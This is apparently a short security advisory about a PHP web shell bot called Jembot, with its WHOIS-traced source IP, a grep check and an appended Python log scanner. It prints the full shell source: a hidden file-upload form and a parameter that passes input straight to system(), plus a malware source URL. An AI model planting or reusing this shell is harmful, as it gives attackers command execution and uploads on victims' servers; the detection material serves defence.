We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
Source code:
<?php
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
{
echo "gagal: " . $_FILES["file"]["error"] . "<br />";
}
else
{
echo "sukses: " . $_FILES["file"]["name"] . "<br />";
echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
echo "mentah: " . $_FILES["file"]["tmp_name"];
}
if (file_exists("" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " wes enek cok. ";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT>
Attacks are coming from IP 187.17.65.242 (Brazil).
WHOIS:
inetnum: 187.17.64/18
aut-num: AS15201
abuse-c: SEO50
owner: Universo Online S.A.
ownerid: 001.109.184/0001-95
responsible: Contato da Entidade UOL
country: BR
owner-c: CAU12
tech-c: CAU12
inetrev: 187.17.64/20
nserver: ns1.host.uol.com.br
nsstat: 20120412 AA
nslastaa: 20120412
nserver: ns2.host.uol.com.br
nsstat: 20120412 AA
nslastaa: 20120412
created: 20081022
changed: 20081022

nic-hdl-br: CAU12
person: Contato Administrativo - UOL
e-mail: l-registrobr-uol@corp.uol.com.br
created: 20031202
changed: 20100106

nic-hdl-br: SEO50
person: Security Office
e-mail: security@uol.com.br
created: 20021114
changed: 20110830

We strongly recommend blocking this IP address and running the following command to detect attacks:
#egrep -n --color "hell.php" *.log
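A broader version of the log check above, added here as an example (it is not part of the original post): it also flags the shell's two GET parameters, `jembot` and `empix`, so a renamed copy of the file is still found. The function names, the common/combined access-log layout and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Indicators from the page: the shell's GET parameters, the file name in the
# page's egrep command, and the reported source IP.
SHELL_PARAMS = {"jembot", "empix"}
SHELL_FILE = "hell.php"
SOURCE_IP = "187.17.65.242"

# Assumed log layout: Apache/nginx common or combined format.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3})')

def classify(line):
    """Return (ip, status, reasons) for one log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    url = urlsplit(target)
    reasons = []
    # parse_qsl percent-decodes names and values; keep_blank_values keeps a
    # bare "?jembot", which PHP's isset() also accepts.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.split("[")[0] in SHELL_PARAMS:
            reasons.append(f"param:{name}={value}")
    # Exact file-name match, so "shell.php" is not reported as "hell.php".
    if unquote(url.path).rsplit("/", 1)[-1] == SHELL_FILE:
        reasons.append("file:" + SHELL_FILE)
    if ip == SOURCE_IP:
        reasons.append("ip:" + SOURCE_IP)
    return ip, int(status), reasons

def scan(lines):
    """Return (line_no, ip, status, reasons) for every line with a match."""
    hits = []
    for no, line in enumerate(lines, 1):
        parsed = classify(line)
        if parsed and parsed[2]:
            hits.append((no, *parsed))
    return hits

# Constructed sample log lines (paths and client addresses are made up).
SAMPLE = [
    '187.17.65.242 - - [12/Apr/2012:10:00:01 +0000] "GET /uploads/hell.php HTTP/1.1" 404 210',
    '198.51.100.7 - - [12/Apr/2012:10:02:10 +0000] "POST /img/cache.php?jembot HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Apr/2012:10:02:30 +0000] "GET /img/cache.php?empix=uname%20-a HTTP/1.1" 200 64',
    '192.0.2.10 - - [12/Apr/2012:10:03:00 +0000] "GET /shell.php?page=2 HTTP/1.1" 200 4096',
]
print(*scan(SAMPLE), sep="\n")
```

A hit with status 200 means the server answered the request, which points to a shell that is actually present; a 404 is a probe that found nothing. The decoded `empix` value is the command that was passed to `system()`.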